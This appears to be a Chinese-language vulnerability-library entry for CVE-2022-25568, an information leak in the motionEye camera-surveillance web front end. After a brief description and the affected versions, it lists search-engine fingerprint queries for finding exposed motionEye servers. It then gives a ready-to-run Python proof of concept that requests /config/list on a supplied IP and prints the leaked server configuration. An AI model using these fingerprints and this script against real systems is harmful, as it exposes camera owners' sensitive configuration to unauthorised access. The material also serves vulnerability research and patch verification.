MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568
漏洞描述
motionEye是用 Python 写的 motion 的 Web 前端,它可以监视视频信号并检测运动。它可以与多种类型的摄像机配合使用,也可以与电影文件一起使用,从而使您可以分析录制的视频,其中存在一个信息泄漏漏洞,通过构造特定的 URL 即可获取服务器敏感信息
漏洞影响
MotionEye <= v0.42.1网络测绘
banner="motionEye"
app="motionEye"
app="motionEye-摄像头服务器"
app="motionEye/0.39.3"
app="motionEye/0.40"
app="motionEye01"
app="motionEye/0.33"
app="motionEye/0.35"漏洞复现
通过查看响应 Server 判断是否使用,访问路由 /config/list
漏洞 POC
import sys
import json
import requests
def exp(url):
if url[-1] == "/":
url = url + "config/list"
else:
url = url + "/config/list"
rus = requests.get(url, verify=False)
print("信息泄露内容:")
print(json.dumps(json.loads(rus.text), sort_keys=True, indent=4))
if __name__ == '__main__':
ip = sys.argv[1]
print("访问IP:{0}".format(ip))
exp(ip)